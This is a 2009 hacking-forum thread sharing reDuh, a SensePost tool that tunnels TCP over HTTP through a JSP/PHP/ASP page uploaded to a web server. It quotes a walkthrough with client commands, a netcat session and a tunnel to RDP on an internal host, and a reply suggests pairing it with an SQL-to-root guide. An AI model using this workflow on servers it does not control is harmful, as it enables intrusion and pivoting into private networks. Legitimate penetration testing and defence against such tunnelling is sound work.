Hacking Tools & Utilities Post your tools, packs and utilities in this section.

InterN0T Affiliates:
EvilZonepy1337

SirCapsAlot.NET

Reply
 
LinkBack Thread Tools Display Modes
  #1  
Old 20th October 2009, 23:10
MaXe's Avatar
Studying shellcode..
 
Join Date: Jun 2008
Location: Sweden - Ljusdal
Posts: 3,405
Blog Entries: 36
Rep Power: 10
Reputation: 198
MaXe has made his way up the systemMaXe has made his way up the system
reDuh - Redirecting TCP over HTTP

[reDuh was released as part of SensePost's BlackHat USA
2008 talk on tunnelling data in and out of networks.]



Hi there,


Today I read about reDuh and I must say that it looked more interesting now
than it did when I saw it the first time long ago, perhaps because carnal0wnage
wrote about it on his blog with a screenshot of how well it worked out.

What can reDuh do?
reDuh is actually a tool that can be used to create a TCP circuit through validly formed HTTP requests.
Essentially this means that if we can upload a JSP/PHP/ASP page on a server, we can connect to hosts be. [readme]

The following are quotations from carnal0wnage's blog.
Quote:
yomama@c0:~/pentest/webapp/reduh/reDuhClient$ sudo java -jar reDuhClient.jar http://172.16.82.144/CFIDE/reDuh.jsp
[Info]Querying remote web page for usable remote service port
[Info]Remote RPC port chosen as 42005
[Info]Attempting to start reDuh from 172.16.82.144:80/CFIDE/reDuh.jsp. Using service port 42005. Please wait...
[Info]reDuhClient service listener started on local port 1010
Once you are connected to the remote end, in another terminal connect to your local reDuh instance.

Quote:
yomama@c0:~$ nc localhost 1010
Welcome to the reDuh command line
>>[usage]
Commands are of the form [command]{options}

Available commands:
[usage] - This menu
[createTunnel]::
[killReDuh] - terminates remote JSP process, and ends this client program
[DEBUG]<0|1|2> - Sets the verbosity
>>[createTunnel]4567:172.16.82.144:3389

Successfully bound locally to port 4567. Awaiting connections.
In your other shell you should see something similar to this:

Quote:
[Info]Caught new service connection on local port 1010
[Info]Successfully bound locally to port 4567. Awaiting connections.
Fire up your terminal server client and point it at localhost:4567

Quote:
[Info]Requesting reDuh to create socket to 172.16.82.144:3389
[Info]Successfully created socket 4567:172.16.82.144:3389:1
[Info]Localhost ====> 172.16.82.144:3389:1 (34 bytes read from local socket)
[Info]Caught data with sequenceNumber 0
[Info]Localhost <==== 172.16.82.144:3389:1 (11 bytes picked up from remote port)
[Info]Localhost ====> 172.16.82.144:3389:1 (386 bytes read from local socket)
[Info]Caught data with sequenceNumber 1
If all is working you'll see a ****load of http traffic and eventually your RDP prompt.




Download Links:
Client: http://www.sensepost.com/research/reDuh/reDuhClient.zip
Server: http://www.sensepost.com/research/re...DuhServers.zip

References:
http://www.sensepost.com/research/reDuh/
http://carnal0wnage.attackresearch.com/node/387
__________________

Quote:
Originally Posted by Norph
MaXe, I really doubt that you are able to browse ANY site more than 2 minutes before you start pwning it xD
Reply With Quote
  #2  
Old 20th October 2009, 23:25
Norph's Avatar
 
Join Date: Oct 2009
Location: Denmark
Posts: 371
Rep Power: 6
Reputation: 78
Norph will become a Token soon
Re: reDuh - Redirecting TCP over HTTP

What's that smell? I think it's awesomeness! ;)
This is pretty cool.
I guess it's effective if you mix it up with that from SQL to ROOT or whatever the guide is called ;)

+rep for posting :) (Of course +rep to creator aswell. duh..)
Reply With Quote
Reply

Bookmarks

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are Off
Pingbacks are Off
Refbacks are On


Similar Threads
Thread Thread Starter Forum Replies Last Post
[Cross Platform] HTTP/socks5 proxies Dragon[Sky] Defensive Software & Anonymity 3 10th June 2010 16:19
http://www.rstcenter.com/ Erratum Exploits, Vulnerabilities & PoCs 1 3rd April 2010 12:58
Slowloris HTTP DoS MaXe Hacking Tools & Utilities 3 20th June 2009 13:44
[Show Off] http://www.big-earn.info/ TheXero General Hacking Discussions 7 3rd October 2008 22:10


All times are GMT +2. The time now is 13:58.
Copyright ©2007 - Forever, InterN0T & Teh Unkwon

Hosted by 1and1